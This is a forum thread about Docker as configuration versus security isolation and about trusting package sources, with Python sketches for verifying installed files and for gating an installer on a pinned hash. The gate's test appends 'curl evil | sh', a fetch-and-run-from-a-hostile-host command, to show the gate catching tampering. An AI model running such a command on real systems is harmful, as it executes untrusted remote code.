
If your goal with containerization is to run trusted applications that just need bizarre systemwide configuration (possibly mutually-conflicting configuration), and keep that configuration separate from the host, then no, it's not a joke. This is a super useful use case for containers.

There's a strong case to be made that you should not trust Docker containers with untrusted code; they're for configuration isolation, not security isolation. After all, Docker runs on top of the shared Linux kernel. If you want to run untrusted code, put it in a VM (KVM, bhyve, Xen, whatever).




I've never argued against the model of containerization for configuration isolation.

I'm arguing against this piece of software and the examples it ships. Giving root access to a trusted web app is not sane.


Docker has kernel support via cgroups (and other features, like namespaces). Vastly different from a simple chroot. Maybe not as strong as full virtualization, but if we're worried about kernel bugs that allow privilege escalation, we have to worry about everything running on the system, because all of it is attack surface for kernel privilege-escalation bugs.

Comparing Docker (or any Linux container using cgroups, like LXC) to chroot is not accurate.


Sure, I agree that Docker is pretty good, and much better at security than a simple chroot. But I think you should be worried about those kernel bugs if you're on Linux, and you should therefore be using actual virtualization (hardware, paravirt, whatever). And therefore, it shouldn't matter how much better Docker is at security than a simple chroot, except as far as defense-in-depth goes: it should not be the single thing you're relying on to sandbox untrusted applications.

That is, I am not saying that Docker is bad at security; I am saying that caring about how much security it provides is using the wrong tool for the job.


> we have to worry about everything running on the system, because it is all surface area for attacking kernel privilege escalation bugs

Usually "everything running on the system" is trusted code. The threat would be a bug in your software that allows remote code execution, which could potentially be combined with a kernel bug to achieve privilege escalation.

The game changes significantly when you're giving arbitrary user-supplied code immediate access to make kernel calls. Now you're only one bug away from game over. And you're trusting the security of your whole system with a mechanism that wasn't really designed for security against untrusted code in the first place.


On that, we're agreed. The Docker ecosystem is scary for that reason. But "trusted code" is also wishful thinking in most deployments. So many deployments are slapped together from a bunch of random sources. The way many people use Docker just takes that to a slightly more terrifying new level of risk.

e.g.: npm, go get, *brew (Homebrew in particular, OMG; the goddamned thing installs everything from webservers to databases to run as the same user, with little warning about what kind of consequences that has), etc.

People do stupid shit all the time with their software deployments, is what I'm trying to say.

I just didn't want people to think Docker (or other Linux containers) are comparable to chroot. They really aren't the same thing.


npm, go get, Homebrew... they're all right by me, in fact. I would rather take the risk and trust them than do so many things manually. They could introduce a safety risk, but so could a can of food you buy from a superstore and eat "as the same user with little warning about what kind of consequences that has".


I've made no suggestion of doing anything manually. That would likely be even more dangerous.

There are well-known and well-understood automated methods of providing a (mostly) trustworthy source for software installation: RPM+yum on CentOS, deb+apt-get on Debian/Ubuntu. The packages can be signed and verified, so you know you're getting what the vendor packaged. The OS-standard sources are open source, easy for third parties to check, and used on millions of machines, so you know manipulation is likely to be spotted quickly. It's easy to verify the versions you have with one command, easy to update to newer versions when security issues arise, and easy to verify that the files currently installed match (or don't) the ones the package shipped with. And it's relatively easy to package one's own tools and put them into a local repository, using the same methods to ensure safe delivery to all of your systems.
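The "verify that installed files match what the package shipped" idea is roughly what `rpm -V` or `debsums` do. A minimal sketch of the concept (hypothetical file names; real package managers keep this database themselves and also GPG-sign the packages):

```python
import hashlib
import os
import tempfile

def file_digest(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def build_manifest(paths):
    # Recorded at install time; rpm/dpkg maintain an equivalent
    # database, on top of signatures over the packages themselves.
    return {p: file_digest(p) for p in paths}

def changed_files(manifest):
    # Which installed files no longer match what the package shipped?
    return [p for p, d in manifest.items() if file_digest(p) != d]

# Demo with a hypothetical "installed" file in a temp dir.
with tempfile.TemporaryDirectory() as root:
    conf = os.path.join(root, "app.conf")
    with open(conf, "w") as f:
        f.write("port = 80\n")
    manifest = build_manifest([conf])
    assert changed_files(manifest) == []        # pristine install
    with open(conf, "a") as f:
        f.write("debug = true\n")               # someone edited it
    assert changed_files(manifest) == [conf]    # drift detected
```

This only detects drift; it doesn't tell you whether the original package was trustworthy, which is what the signed-repository machinery is for.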

I understand using other methods of locally providing packages. And, I understand that sometimes you have to go outside the vendor provided packages (and can't build your own, using the same best practices). But, to imagine that you can/should trust a big blob of data grabbed from the internet and splooshed onto your system (sometimes as root!) using a pipe to /bin/sh, is ridiculous. Don't do that in an automated fashion without explicitly checking out what you're being delivered. And, I would probably opt to host my own private repo of those things, so that I can re-verify any time there are changes before they get splooshed out to all of my systems.
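For the pipe-to-/bin/sh case, "explicitly checking out what you're being delivered" can be as simple as pinning the digest of the script you actually reviewed and refusing to run anything else. A sketch under those assumptions (the installer bytes and digest here are hypothetical):

```python
import hashlib

# Digest recorded the one time the installer was actually read.
REVIEWED = b"#!/bin/sh\necho installing reviewed version\n"
PINNED_SHA256 = hashlib.sha256(REVIEWED).hexdigest()

def gate_installer(script: bytes, pinned: str = PINNED_SHA256) -> bytes:
    """Return the script (to hand to the shell) only if it still
    matches what was reviewed; otherwise refuse to run it."""
    if hashlib.sha256(script).hexdigest() != pinned:
        raise RuntimeError("installer changed since review; re-verify it")
    return script

assert gate_installer(REVIEWED) == REVIEWED      # unchanged: allowed
try:
    gate_installer(REVIEWED + b"curl evil | sh\n")
except RuntimeError:
    pass                                         # changed: blocked
```

Hosting a private mirror, as suggested above, is the same pattern applied at the repository level: changes upstream force a re-review before anything reaches your systems.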

This is basic operations stuff here, and yet folks keep reinventing the wheel, poorly, and aggressively marketing it as a superior wheel.



